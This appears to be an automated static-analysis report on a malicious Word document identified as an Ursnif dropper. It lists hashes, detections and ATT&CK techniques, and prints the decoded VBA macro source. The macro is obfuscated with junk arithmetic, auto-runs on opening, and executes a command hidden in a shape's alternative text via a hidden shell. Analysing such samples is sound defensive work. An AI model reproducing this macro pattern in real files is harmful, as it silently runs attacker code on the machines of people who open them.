Ursnif — Office (OLE) malware analysis

Static analysis result for SHA-256 f678b866da721a34…

MALICIOUS

Office (OLE)

68.0 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: 7dc2b1fed84a64f8028c5a6fd457e8c0 SHA-1: 8613d39bb694a0b825c6c5f2a7136565313807a9 SHA-256: f678b866da721a342da98931bc9dd894c57ee281ebb384f4576c54540d6cbb17
142 Risk Score

Malware Insights

Ursnif · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as a malicious Word document by ClamAV, specifically as a dropper for Ursnif. The presence of an AutoOpen VBA macro, detected by multiple heuristics, indicates that the document is designed to execute malicious code upon opening. The VBA script uses Interaction.Shell to execute a command, likely to download and run a second-stage payload, which is a common Ursnif behavior.

Heuristics 5

  • ClamAV: Doc.Dropper.Ursnif-6864686-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1584 bytes
SHA-256: 96d36366db9060b513ccde8e593a73920beceada1fba63a0b5b3109e516fe6fa
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mvyvidu"
Function fguzymotep()





Dim uuRZOzh As Integer
Dim hfasurubaho As Long
uuRZOzh = 6007# - 3259#
Dim nreder As Variant
nreder = uuRZOzh - 7978#

Dim bFrcEXq As Integer
Dim rfivudufawe As Long
bFrcEXq = 3844# - 5565#
Dim chasyruce As Variant
chasyruce = bFrcEXq - 9364#



Set fguzymotep = ActiveDocument.Shapes(2)

Dim mtCQytlh As Integer
Dim CAZDfp As Long
mtCQytlh = 7747# - 4430#
Dim cjuluv As Variant
cjuluv = mtCQytlh - 4055#



End Function
Sub AutoOpen()

Dim jpanufunep As Integer
Dim Kvoonya As Long
jpanufunep = 1038# - 8429#
Dim lsylyzepo As Variant
lsylyzepo = jpanufunep - 5033#





Set QchXsj = fguzymotep

EGXycVq = fguzymotep.AlternativeText

Dim YOAHEUr As Integer
Dim sbafaqewoto As Long
YOAHEUr = 1725# - 5057#
Dim yehDvTy As Variant
yehDvTy = YOAHEUr - 5473#

Dim flamox As Integer
Dim YJzoEzvo As Long
flamox = 5464# - 4947#
Dim lvavefo As Variant
lvavefo = flamox - 8047#

Interaction.Shell@ _
EGXycVq, vbHide

Dim kHFDxvfe As Integer
Dim jWrMFO As Long
kHFDxvfe = 3070# - 2958#
Dim zUnJeFpl As Variant
zUnJeFpl = kHFDxvfe - 2577#



Dim fqinaruza As Integer
Dim jJXFS As Long
fqinaruza = 9940# - 1031#
Dim qjeqa As Variant
qjeqa = fqinaruza - 7460#



End Sub